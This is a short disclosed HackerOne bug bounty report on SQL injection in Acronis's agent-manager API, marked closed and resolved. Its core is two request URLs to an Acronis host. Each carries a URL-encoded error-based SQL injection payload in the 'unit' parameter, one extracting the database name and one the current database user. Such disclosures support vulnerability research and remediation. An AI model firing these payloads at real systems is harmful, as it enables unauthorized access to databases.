SQL Injection in agent-manager

Disclosed: 2021-08-16 09:37:25 By bourbon To acronis
High
Vulnerability Details
1.https://mc-beta-cloud.acronis.com/api/agent_manager/v2/unit_configurations?name=update-schedule&no_data=false&tenant_id=1590228&unit=atp-agent%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2C%28select+database%28%29%29%29%29and%27 2.https://mc-beta-cloud.acronis.com/api/agent_manager/v2/unit_configurations?name=update-schedule&no_data=false&tenant_id=1590228&unit=atp-agent%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2C%28select+user%28%29%29%29%29and%27 ## Impact sql injection
Actions
View on HackerOne
Report Stats
  • Report ID: 962889
  • State: Closed
  • Substate: resolved
  • Upvotes: 225
Share this report